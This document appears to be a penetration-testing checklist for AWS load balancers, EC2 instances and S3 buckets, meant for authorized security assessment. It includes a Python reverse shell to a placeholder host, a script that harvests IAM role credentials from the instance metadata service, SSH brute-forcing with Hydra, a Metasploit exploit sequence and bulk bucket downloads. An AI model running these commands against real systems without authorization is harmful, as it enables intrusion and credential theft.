💻AWS

AWS Penetration Testing: Load Balancer (ELB), EC2, and S3

When testing AWS infrastructure that includes Elastic Load Balancers (ELB), EC2 instances and S3 buckets, the useful work is in the tools, commands and checks that are specific to how these services behave (load balancer addresses that change, security groups in front of instances, the instance metadata service, bucket ACLs and policies). Below is a checklist, organized by service, of what to run and what to look for in the output.


1. Elastic Load Balancer (ELB) Penetration Testing

Checklist:

  1. Identify ELB IP Addresses:

    • Use dig or nslookup to resolve the ELB's DNS name. An internet-facing ELB answers with several public IPs that AWS changes over time, so scope and record the target by DNS name rather than by IP; an internal ELB resolves to private addresses and is only reachable from inside the VPC.

      dig elb-domain-name.com
      nslookup elb-domain-name.com
    • Check for DNS misconfigurations:

      • Look through the target's own zone for records that point at an internal ELB name (leaking private IP addresses and the existence of internal services) or at a load balancer that has since been deleted.

  2. SSL/TLS Configuration:

    • Testing for SSL/TLS Weaknesses:

      • Use sslscan or nmap to enumerate the protocol versions and cipher suites the listener accepts. On an ELB these come from the listener's predefined security policy (shown as SslPolicy by aws elbv2 describe-listeners), so a weak cipher is a listener configuration finding, not a backend one.

        sslscan elb-domain-name.com
        nmap --script ssl-enum-ciphers -p 443 elb-domain-name.com
    • Check SSL/TLS certificate validity and configuration:

      • Validate the certificate chain with openssl. Pass -servername: an Application Load Balancer can hold several certificates and selects one by SNI, so without it you may be shown the default certificate rather than the one for the host under test.

        openssl s_client -connect elb-domain-name.com:443 -servername elb-domain-name.com
    • Scan for supported protocols:

      • Confirm that TLS 1.0 and 1.1 (and SSLv3 on older Classic Load Balancer policies) are disabled and that the policy allows no RC4, 3DES or export-grade suites.

  3. CORS Misconfiguration:

    • Test for CORS issues:

      • A plain request does not exercise CORS. Send an Origin header you control with curl (or via Burp Suite) and inspect the Access-Control-* response headers; https://evil.example below is a placeholder for your own origin. These headers are normally produced by the application behind the load balancer, so the finding belongs to the backend.

        curl -sI -H "Origin: https://evil.example" https://elb-domain-name.com
    • A response that echoes the supplied origin in Access-Control-Allow-Origin, especially together with Access-Control-Allow-Credentials: true, lets any site read authenticated responses from the target. A bare wildcard (*) is lower risk because browsers refuse to send credentials with it.

  4. HTTP/HTTPS Security Headers:

    • Security Header Check:

      • Verify that Strict-Transport-Security, Content-Security-Policy, X-Content-Type-Options and X-Frame-Options are present and sensible. curl -I issues a HEAD request, which some applications handle differently from GET; if the output looks odd, fetch with GET and dump only the headers (curl -s -D - -o /dev/null).

        curl -I https://elb-domain-name.com
  5. Load Balancer Configuration Review:

    • Check for redundant listeners:

      • Verify that only the listeners the application needs are exposed (typically 443, with 80 present only to redirect to HTTPS) and that the HTTP listener does not serve content in clear text.

    • Check that the load balancer cannot be bypassed:

      • Targets should accept traffic only from the load balancer's security group. If an instance's public IP answers on the same ports, TLS termination, access logging and any WAF attached to the load balancer can be sidestepped by talking to the target directly.

    • Health Check Mechanisms:

      • The health check path must be reachable from the load balancer, so it is usually reachable from the internet too; confirm it returns only an up/down status rather than version strings, dependency states or stack traces.
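
The CORS and security-header checks in steps 3 and 4 are easier to read off when the header dump is evaluated mechanically. The script below is an added example, not part of the original checklist: it captures response headers with curl for a host you name and runs two pure functions over them, which can equally be run over a saved header dump. The host argument, the attacker origin https://evil.example and the baseline header set are assumptions.

```sh
#!/bin/sh
# Added example: evaluate an ELB's HTTP layer for CORS reflection and missing
# security headers. Usage: sh elb_http_probe.sh <host> [origin]
# The target host and the attacker-controlled origin are placeholders you supply.

# header_value HEADERS NAME: value of header NAME (case-insensitive) from a raw dump.
header_value() {
  printf '%s\n' "$1" | tr -d '\r' |
    awk -F': ' -v want="$2" 'tolower($1) == want { print $2; exit }'
}

# check_cors HEADERS ORIGIN: classify the CORS response to a request that
# carried "Origin: ORIGIN". Prints one verdict line; always returns 0.
check_cors() {
  acao=$(header_value "$1" access-control-allow-origin)
  acac=$(header_value "$1" access-control-allow-credentials)
  if [ -n "$acao" ] && [ "$acao" = "$2" ]; then
    if [ "$acac" = "true" ]; then
      echo "CRITICAL: origin $2 reflected with Allow-Credentials true (cross-site read of authenticated responses)"
    else
      echo "HIGH: origin $2 reflected (cross-site read of unauthenticated responses)"
    fi
  elif [ "$acao" = "*" ]; then
    echo "INFO: wildcard Allow-Origin; browsers will not send credentials, confirm the data is non-sensitive"
  else
    echo "OK: origin not reflected (Allow-Origin is ${acao:-absent})"
  fi
}

# check_security_headers HEADERS: list baseline headers that are absent.
check_security_headers() {
  missing=""
  for h in strict-transport-security content-security-policy \
           x-content-type-options x-frame-options; do
    [ -n "$(header_value "$1" "$h")" ] || missing="$missing $h"
  done
  if [ -z "$missing" ]; then
    echo "OK: baseline security headers present"
  else
    echo "MISSING:$missing"
  fi
}

# probe_elb HOST [ORIGIN]: fetch the headers live and run both checks.
probe_elb() {
  origin="${2:-https://evil.example}"
  hdrs=$(curl -sS -o /dev/null -D - --max-time 15 -H "Origin: $origin" "https://$1/")
  check_cors "$hdrs" "$origin"
  check_security_headers "$hdrs"
}

if [ $# -gt 0 ]; then
  probe_elb "$@"
fi
```

Run it as sh elb_http_probe.sh elb-domain-name.com. A CRITICAL verdict is the one worth writing up on its own; HIGH matters when the endpoint returns data an attacker could not otherwise fetch, and the MISSING list goes into the hardening recommendations rather than the findings.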

Tools:

  • nmap

  • sslscan

  • curl

  • Burp Suite

  • openssl


2. EC2 Instance Penetration Testing

Checklist:

  1. Instance Enumeration:

    • Identify EC2 instance IPs and associated services:

      • Use nmap to scan for open ports and services (-sS needs root). Security groups are default-deny, so a port that shows as filtered from the internet may still be open to the VPC or to a load balancer; compare the external view with what the instance's security groups actually allow. Also check whether instances that sit behind an ELB answer directly on their own public IP, which bypasses the load balancer.

        nmap -sS -sV -p- ec2-instance-ip
  2. Service Vulnerability Scanning:

    • Scan for outdated software:

      • Use tools like Nessus, OpenVAS, or Nikto.

      • Example with nikto:

        nikto -h http://ec2-instance-ip
  3. Brute Force SSH (If SSH is enabled):

    • Test for weak SSH credentials:

      • Stock AMIs ship with root login disabled and password authentication off, so this applies only where an operator has enabled passwords (ssh -v shows whether "password" is among the offered methods). Target the distribution's default account (ec2-user on Amazon Linux, ubuntu on Ubuntu, admin on Debian) rather than root, and keep the thread count low to avoid tripping lockout tooling.

        hydra -l ec2-user -P /path/to/wordlist.txt -t 4 ssh://ec2-instance-ip
  4. Privilege Escalation:

    • Check for Sudo Privileges and Weak Configurations:

      • Run sudo -l to list what the current user may run as root. On stock AMIs the default account already has passwordless sudo, so a shell as ec2-user or ubuntu is usually root already.

      • Look for SUID binaries, writable cron jobs and service unit files, and credentials left in shell history or cloud-init output (/var/log/cloud-init-output.log often echoes the instance's user-data).

  5. Reverse Shell and Persistence:

    • Establish a reverse shell:

      • Start a listener on your-ip:your-port, then run a Python reverse shell on the instance (your-ip and your-port are placeholders; current AMIs ship python3):

        python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("your-ip",your-port)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'
      • Security groups filter inbound traffic and by default allow all outbound traffic, which is why reverse shells out of EC2 usually work unless the VPC has egress controls.

    • Check for AWS IAM roles attached to the instance:

      • Query the instance metadata service (IMDS). Where the instance enforces IMDSv2 (HttpTokens=required), every request must carry a session token obtained with a PUT; the token-less IMDSv1 call from older guides only works if the instance still allows it.

        TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
        curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
      • The listing returns the role name; appending it to the path returns AccessKeyId, SecretAccessKey and a session Token. Fetch /latest/user-data with the same token as well, since bootstrap scripts frequently embed secrets.
  6. AWS CLI Credential Harvesting:

    • Check for stored AWS credentials:

      • Look in ~/.aws/credentials and ~/.aws/config, in environment variables and in application configuration on disk. Credentials taken from the instance role are temporary and are rejected unless the session token is supplied too (aws_session_token in the profile or AWS_SESSION_TOKEN in the environment).

      • Use the AWS CLI to establish who the credentials belong to, then enumerate what they can reach. aws iam list-users needs iam:ListUsers, which instance roles rarely have, so an AccessDenied there says nothing about what the role can do to EC2, S3 or Secrets Manager.

        aws sts get-caller-identity --profile compromised-profile
        aws iam list-users --profile compromised-profile
  7. Exploit Known Vulnerabilities:

    • Exploit software vulnerabilities:

      • Match the versions fingerprinted by nmap -sV and Nikto against Metasploit modules; the Struts module below is one example, not a default choice. Current Metasploit takes RHOSTS rather than RHOST.

        msfconsole
        use exploit/multi/http/struts2_content_type_ognl
        set RHOSTS ec2-instance-ip
        run
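
Steps 5 and 6 above are one procedure: get credentials off the instance, then use them. The script below is an added example rather than the page's own code. It talks to IMDSv2 properly, pulls the role credentials and the user-data, and turns the credential JSON into the three environment variables the AWS CLI needs (the session token included, which is the piece most often left out). The sample response embedded in the script is constructed, its key values are fabricated placeholders that work nowhere, and the file name imds_harvest.sh is an assumption; with --live the script queries the real metadata service from inside an instance.

```sh
#!/bin/sh
# Added example: harvest the instance role credentials from EC2 IMDSv2 and
# emit them as AWS CLI environment variables.
# On a compromised instance:  eval "$(sh imds_harvest.sh --live)"
# Without --live the script runs on the constructed sample below.

IMDS="http://169.254.169.254"

# Constructed sample of what /latest/meta-data/iam/security-credentials/<role>
# returns. The key material is made up and will not authenticate anywhere.
SAMPLE_CREDS='{
  "Code" : "Success",
  "LastUpdated" : "2030-01-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLECONSTRUCTED",
  "SecretAccessKey" : "constructedSecret/NotReal+0000000000000000000",
  "Token" : "IQoJconstructedSessionToken==",
  "Expiration" : "2030-01-01T06:00:00Z"
}'

# json_field JSON KEY: first string value for KEY (enough for IMDS's flat JSON).
json_field() {
  printf '%s\n' "$1" | sed -n "s/.*\"$2\" *: *\"\([^\"]*\)\".*/\1/p" | head -n 1
}

# creds_to_env JSON: print the three exports the AWS CLI needs. Temporary
# credentials are rejected with InvalidClientTokenId if the session token is missing.
creds_to_env() {
  printf 'export AWS_ACCESS_KEY_ID=%s\n'     "$(json_field "$1" AccessKeyId)"
  printf 'export AWS_SECRET_ACCESS_KEY=%s\n' "$(json_field "$1" SecretAccessKey)"
  printf 'export AWS_SESSION_TOKEN=%s\n'     "$(json_field "$1" Token)"
}

# imds_get TOKEN PATH: IMDSv2 GET. -f makes a 401/404 a failure instead of
# quietly storing an error page in the caller's variable.
imds_get() {
  curl -sf --max-time 5 -H "X-aws-ec2-metadata-token: $1" "$IMDS$2"
}

harvest_live() {
  # The PUT with a TTL header is the only way to get a token. If it times out
  # from inside a container, the instance's PUT response hop limit (default 1)
  # is dropping the reply; that limit does not apply to IMDSv1 GETs.
  tok=$(curl -sf --max-time 5 -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 300" \
        "$IMDS/latest/api/token") || { echo "IMDSv2 token request failed" >&2; return 1; }
  role=$(imds_get "$tok" /latest/meta-data/iam/security-credentials/) \
    || { echo "no IAM instance profile attached" >&2; return 1; }
  creds=$(imds_get "$tok" "/latest/meta-data/iam/security-credentials/$role")
  echo "# role $role, credentials expire $(json_field "$creds" Expiration)"
  creds_to_env "$creds"
  # user-data is a frequent home of bootstrap secrets; a 404 means none was set.
  if imds_get "$tok" /latest/user-data > user-data.txt 2>/dev/null; then
    echo "# user-data saved to ./user-data.txt"
  fi
}

if [ "${1:-}" = "--live" ]; then
  harvest_live
else
  creds_to_env "$SAMPLE_CREDS"
fi
```

After the eval, aws sts get-caller-identity confirms the role ARN and account; from there enumerate what the role can touch rather than starting with IAM listing calls, which instance roles are rarely allowed to make. The expiry printed in the comment line tells you how long the harvested credentials stay valid; IMDS rotates them well before that point, so re-run the harvest rather than caching them.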

Tools:

  • nmap

  • Nikto

  • Hydra

  • Metasploit

  • AWS CLI

  • curl


3. S3 Bucket Penetration Testing

Checklist:

  1. Bucket Enumeration:

    • Identify S3 buckets:

      • Use the AWS CLI, S3Scanner or s3recon. For an unauthenticated check add --no-sign-request; without it the CLI signs the request with whatever credentials it finds, and a listing that works only because your own account has access is not a public-exposure finding.

        aws s3 ls s3://bucket-name --region region --no-sign-request
      • Use S3Scanner to find open S3 buckets (this is the syntax of the original Python script; current releases ship an s3scanner binary with a scan subcommand):

        python s3scanner.py bucket-name
  2. Bucket Access Control:

    • Check for publicly accessible buckets:

      • Read the ACL and look for grants whose Grantee URI ends in global/AllUsers (anonymous) or global/AuthenticatedUsers (any AWS account, which is effectively public); the Permission on such a grant (READ, WRITE, READ_ACP, WRITE_ACP or FULL_CONTROL) says what is exposed. Reading the ACL itself needs READ_ACP, so from an anonymous position this usually fails even when objects are readable; test listing and download separately.

        aws s3api get-bucket-acl --bucket bucket-name
    • Test Bucket Policies:

      • Use the AWS CLI to view and assess the bucket policy, looking for a Principal of "*" without a restrictive Condition. get-bucket-policy-status returns AWS's own IsPublic verdict, and get-public-access-block shows whether Block Public Access is switched on for the bucket or account, which overrides permissive ACLs and policies.

        aws s3api get-bucket-policy --bucket bucket-name
  3. Data Extraction:

    • Download accessible data:

      • If the bucket is publicly readable, mirror its contents (again with --no-sign-request when the point is anonymous access):

        aws s3 sync s3://bucket-name ./local-directory --region region --no-sign-request
    • Search for sensitive data:

      • Run truffleHog over the downloaded tree. The --regex and --entropy flags belong to the old v2 syntax, which only accepted git repositories; v3 takes a source subcommand, and with credentials it can read a bucket directly via trufflehog s3 --bucket.

        trufflehog filesystem ./local-directory
  4. Bucket Enumeration via Brute Force:

    • Brute force potential bucket names:

      • Use a wordlist-driven tool such as LazyS3, which permutes a company name with common suffixes (dev, backup, logs and so on) and checks each candidate. LazyS3 is a Ruby script, not Python:

        ruby lazys3.rb company-name
  5. Exploit S3 vulnerabilities:

    • Check for common S3 misconfigurations:

      • Review the CORS rules (an AllowedOrigin of * combined with PUT or POST in AllowedMethods lets any site write to a bucket that is also publicly writable) and the static website configuration. A website configuration means the bucket is also served from its region's s3-website endpoint; if the target's DNS has a CNAME to such an endpoint for a bucket that no longer exists, whoever creates a bucket with that name takes over the hostname.

        aws s3api get-bucket-cors --bucket bucket-name
        aws s3api get-bucket-website --bucket bucket-name

Tools:

  • awscli

  • S3Scanner

  • truffleHog

  • LazyS3

  • curl


This list covers the essential steps and tools for testing ELB, EC2 and S3 deployments; each command is there because it answers a question specific to how that service is configured and exposed. Test only with written authorization from the account owner, and stay inside AWS's customer penetration testing policy: customers may test their own EC2 instances and load balancers without asking AWS first, but denial-of-service and stress testing, and attacks directed at the S3 service itself, are not permitted, so treat the S3 items above as configuration review of buckets you are authorized to assess.
